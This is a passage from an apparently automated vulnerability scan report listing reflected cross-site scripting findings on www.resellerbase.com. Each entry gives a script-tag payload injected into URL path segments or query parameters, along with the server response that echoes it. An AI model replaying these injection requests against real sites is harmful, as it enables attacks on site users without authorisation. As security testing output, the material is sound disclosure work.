GET /detail/5/themes/kosmos913d4<script>alert(1)</script>0610dd3d95a/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos913d4<script>alert(1)</script>0610dd3d95a/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.3395. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/4half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 71b71<script>alert(1)</script>14bbeef47ca was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images71b71<script>alert(1)</script>14bbeef47ca/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images71b71<script>alert(1)</script>14bbeef47ca/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.3396. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/4half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2f0de<script>alert(1)</script>a00d587521e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/rating2f0de<script>alert(1)</script>a00d587521e/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/rating2f0de<script>alert(1)</script>a00d587521e/4half.gif was not found on this server.</p>
...[SNIP]...

2.3397. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/4half.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload b7cea<script>alert(1)</script>20f783830dd was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/rating/4half.gifb7cea<script>alert(1)</script>20f783830dd HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/rating/4half.gifb7cea<script>alert(1)</script>20f783830dd was not found on this server.</p>
...[SNIP]...

2.3398. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 20138<script>alert(1)</script>93bc67fb58e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/rating/4half.gif?20138<script>alert(1)</script>93bc67fb58e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/rating/4half.gif?20138<script>alert(1)</script>93bc67fb58e=1 was not found on this server.</p>
...[SNIP]...

2.3399. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6e5be<script>alert(1)</script>be6e9e12263 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail6e5be<script>alert(1)</script>be6e9e12263/5/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6e5be<script>alert(1)</script>be6e9e12263/5/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3400. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a2988<script>alert(1)</script>645ee2e450e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5a2988<script>alert(1)</script>645ee2e450e/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5a2988<script>alert(1)</script>645ee2e450e/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3401. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a32f7<script>alert(1)</script>a84a9a29feb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themesa32f7<script>alert(1)</script>a84a9a29feb/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themesa32f7<script>alert(1)</script>a84a9a29feb/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3402. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ac74b<script>alert(1)</script>a4f0247c2b3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmosac74b<script>alert(1)</script>a4f0247c2b3/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmosac74b<script>alert(1)</script>a4f0247c2b3/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3403. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8346c<script>alert(1)</script>619c74e2f3e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images8346c<script>alert(1)</script>619c74e2f3e/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images8346c<script>alert(1)</script>619c74e2f3e/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3404. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4e28f<script>alert(1)</script>5cb3e2d552a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/rating4e28f<script>alert(1)</script>5cb3e2d552a/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/rating4e28f<script>alert(1)</script>5cb3e2d552a/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3405. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 92d1a<script>alert(1)</script>d6c1220694e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/rating/search.php92d1a<script>alert(1)</script>d6c1220694e?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/rating/search.php92d1a<script>alert(1)</script>d6c1220694e?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3406. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3e377<a>c254484757e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3e377<a>c254484757e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3e377<a>c254484757e&opt=2 was not found on this server.</p>
...[SNIP]...

2.3407. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 6789d<a>1818c608f12 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/images/rating/search.php?keyword=search...6789d<a>1818c608f12&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/rating/search.php?keyword=search...6789d<a>1818c608f12&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3408. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 83e9f<script>alert(1)</script>b70666195e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&83e9f<script>alert(1)</script>b70666195e9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&83e9f<script>alert(1)</script>b70666195e9=1 was not found on this server.</p>
...[SNIP]...

2.3409. http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ef0d9<a>8644c14f525 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ef0d9<a>8644c14f525 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ef0d9<a>8644c14f525 was not found on this server.</p>
...[SNIP]...

2.3410. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload afc77<script>alert(1)</script>8f7a69ba00b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailafc77<script>alert(1)</script>8f7a69ba00b/5/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailafc77<script>alert(1)</script>8f7a69ba00b/5/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.3411. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be40f<script>alert(1)</script>e6db0c2c242 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5be40f<script>alert(1)</script>e6db0c2c242/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5be40f<script>alert(1)</script>e6db0c2c242/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.3412. http://www.resellerbase.com/detail/5/themes/kosmos/images/review/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ca612<script>alert(1)</script>6f87f7d9523 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themesca612<script>alert(1)</script>6f87f7d9523/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
